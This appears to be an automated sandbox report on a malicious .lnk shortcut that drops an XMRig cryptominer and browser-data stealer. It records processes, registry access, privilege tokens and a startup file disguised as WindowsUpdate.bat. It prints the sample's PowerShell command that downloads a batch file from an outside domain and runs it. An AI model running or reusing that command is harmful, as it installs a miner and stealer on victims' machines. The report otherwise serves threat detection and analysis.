Malware Analysis Report

2024-12-07 17:18

Sample ID 241112-s52l5avkdv
Target 39cb1b5b48070a2e442352125d217f0d8cfd8bf36c74b37db2b4f3085a553be5.lnk
SHA256 39cb1b5b48070a2e442352125d217f0d8cfd8bf36c74b37db2b4f3085a553be5
Tags
execution xmrig credential_access defense_evasion discovery miner spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

39cb1b5b48070a2e442352125d217f0d8cfd8bf36c74b37db2b4f3085a553be5

Threat Level: Known bad

The file 39cb1b5b48070a2e442352125d217f0d8cfd8bf36c74b37db2b4f3085a553be5.lnk was found to be: Known bad.

Malicious Activity Summary

execution xmrig credential_access defense_evasion discovery miner spyware stealer

xmrig

Xmrig family

XMRig Miner payload

Uses browser remote debugging

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Drops startup file

Loads dropped DLL

Reads user/profile data of web browsers

Checks computer location settings

Looks up external IP address via web service

Hide Artifacts: Hidden Window

Drops file in System32 directory

Drops file in Program Files directory

System Location Discovery: System Language Discovery

Browser Information Discovery

Enumerates physical storage devices

Modifies registry class

Kills process with taskkill

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-12 15:43

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-12 15:43

Reported

2024-11-12 15:46

Platform

win7-20240903-en

Max time kernel

118s

Max time network

126s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\39cb1b5b48070a2e442352125d217f0d8cfd8bf36c74b37db2b4f3085a553be5.lnk

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\39cb1b5b48070a2e442352125d217f0d8cfd8bf36c74b37db2b4f3085a553be5.lnk

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -URI https://sealingshop.click/bat/encode/bostar1_en.txt?info=df345rs -OutFile C:/Users/Public/img.bat;powershell C:/Users/Public/img.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:/Users/Public/img.bat

Network

N/A

Files

memory/2692-38-0x000007FEF5FDE000-0x000007FEF5FDF000-memory.dmp

memory/2692-39-0x000000001B620000-0x000000001B902000-memory.dmp

memory/2692-40-0x0000000001F60000-0x0000000001F68000-memory.dmp

memory/2692-41-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

memory/2692-42-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

memory/2692-43-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

memory/2692-44-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

memory/2692-49-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-12 15:43

Reported

2024-11-12 15:46

Platform

win10v2004-20241007-en

Max time kernel

117s

Max time network

158s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\39cb1b5b48070a2e442352125d217f0d8cfd8bf36c74b37db2b4f3085a553be5.lnk

Signatures

Xmrig family

xmrig

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.bat C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A
N/A N/A C:\Users\Public\python39\python.exe N/A

Reads user/profile data of web browsers

spyware stealer

Hide Artifacts: Hidden Window

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\symbols\exe\chromedriver.exe.pdb C:\Users\Admin\.cache\selenium\chromedriver\win64\123.0.6312.122\chromedriver.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\DLL\kernel32.pdb C:\Users\Admin\.cache\selenium\chromedriver\win64\123.0.6312.122\chromedriver.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\symbols\DLL\kernel32.pdb C:\Users\Admin\.cache\selenium\chromedriver\win64\123.0.6312.122\chromedriver.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\ntdll.pdb C:\Users\Admin\.cache\selenium\chromedriver\win64\123.0.6312.122\chromedriver.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\dll\ntdll.pdb C:\Users\Admin\.cache\selenium\chromedriver\win64\123.0.6312.122\chromedriver.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\chromedriver.exe.pdb C:\Users\Admin\.cache\selenium\chromedriver\win64\123.0.6312.122\chromedriver.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\exe\chromedriver.exe.pdb C:\Users\Admin\.cache\selenium\chromedriver\win64\123.0.6312.122\chromedriver.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\kernel32.pdb C:\Users\Admin\.cache\selenium\chromedriver\win64\123.0.6312.122\chromedriver.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\symbols\dll\ntdll.pdb C:\Users\Admin\.cache\selenium\chromedriver\win64\123.0.6312.122\chromedriver.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\python39\lib\site-packages\selenium\webdriver\common\windows\selenium-manager.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Public\PublicAlbums\xmrig.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3216 wrote to memory of 4932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3216 wrote to memory of 4932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4932 wrote to memory of 2284 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4932 wrote to memory of 2284 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2284 wrote to memory of 2696 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2284 wrote to memory of 2696 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2696 wrote to memory of 1900 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2696 wrote to memory of 1900 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2696 wrote to memory of 5100 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2696 wrote to memory of 5100 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1900 wrote to memory of 1532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 1532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
